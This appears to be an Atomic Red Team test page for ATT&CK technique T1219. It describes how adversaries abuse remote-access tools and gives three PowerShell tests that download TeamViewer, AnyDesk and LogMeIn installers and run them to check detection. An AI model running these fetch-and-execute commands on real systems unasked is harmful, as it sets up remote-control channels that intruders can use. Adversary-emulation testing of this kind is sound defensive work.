# T1219 - Remote Access Tools
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1219)
<blockquote>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.

Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</blockquote>

## Atomic Tests

- [Atomic Test #1 - TeamViewer Files Detected Test on Windows](#atomic-test-1---teamviewer-files-detected-test-on-windows)

- [Atomic Test #2 - AnyDesk Files Detected Test on Windows](#atomic-test-2---anydesk-files-detected-test-on-windows)

- [Atomic Test #3 - LogMeIn Files Detected Test on Windows](#atomic-test-3---logmein-files-detected-test-on-windows)


<br/>

## Atomic Test #1 - TeamViewer Files Detected Test on Windows
An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed.

**Supported Platforms:** Windows





#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe
C:\Users\$env:username\Desktop\TeamViewer_Setup.exe
```






<br/>
<br/>

## Atomic Test #2 - AnyDesk Files Detected Test on Windows
An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed.

**Supported Platforms:** Windows





#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
C:\Users\$env:username\Desktop\AnyDesk.exe
```






<br/>
<br/>

## Atomic Test #3 - LogMeIn Files Detected Test on Windows
An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed.

**Supported Platforms:** Windows





#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi
C:\Users\$env:username\Desktop\LogMeInIgnition.msi
```






<br/>
